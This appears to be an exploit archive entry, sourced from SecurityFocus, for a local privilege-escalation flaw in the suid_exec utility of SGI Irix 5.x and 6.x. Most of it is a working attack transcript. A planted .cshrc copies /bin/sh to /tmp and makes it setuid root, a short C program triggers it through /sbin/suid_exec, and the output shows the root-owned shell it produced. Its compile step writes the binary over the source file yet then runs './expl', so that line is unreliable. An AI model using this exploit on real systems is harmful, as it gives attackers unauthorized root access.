23 lines
No EOL
862 B
Text
23 lines
No EOL
862 B
Text
source: http://www.securityfocus.com/bid/467/info
|
|
|
|
A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root.
|
|
|
|
|
|
% setenv | grep SHELL
|
|
SHELL=/bin/tcsh
|
|
% mv ~/.cshrc ~/.cshrc.old
|
|
% cat > ~/.cshrc
|
|
cp /bin/sh /tmp
|
|
chmod a+rsx /tmp/sh
|
|
^D
|
|
% cat > expl.c
|
|
main()
|
|
{
|
|
execl("/sbin/suid_exec","/bin/su","/bin/su",0);
|
|
}
|
|
^D
|
|
% cc expl.c -o expl.c
|
|
% ./expl
|
|
Too many ('s.
|
|
% ls -l /tmp/sh
|
|
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh* |